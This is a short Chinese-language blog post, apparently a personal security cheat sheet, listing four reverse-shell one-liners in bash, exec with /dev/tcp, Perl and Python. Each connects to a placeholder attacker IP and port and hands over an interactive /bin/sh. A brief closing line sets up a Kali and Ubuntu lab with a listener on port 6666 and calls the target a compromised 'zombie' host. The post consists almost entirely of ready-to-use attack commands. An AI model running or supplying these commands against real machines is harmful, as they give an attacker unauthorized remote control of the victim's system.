反弹shell命令

1.利用exec弹

exec 5<> /dev/tcp/攻击机ip/监听端口 0>&1
     cat <&5 | while read line; do $line 2>&5 >&5; done

2.利用bash弹,在目标机器上执行

bash -i >& /dev/tcp/攻击机ip/监听端口 0>&1

3.利用perl弹

perl -e 'use Socket;$i="攻击机ip";$p=监听端口;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

4.利用python弹

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机ip",监听端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

测试环境:kali,Ubuntu-server 首先在Ubuntu-server服务器上开6666端口,等待连接: 肉鸡执行命令: 攻击机ip为192.168.56.101,端口号6666 获得shell:

  • Copyrights © 2018-2021 rich4rd
  • Visitors: | Views: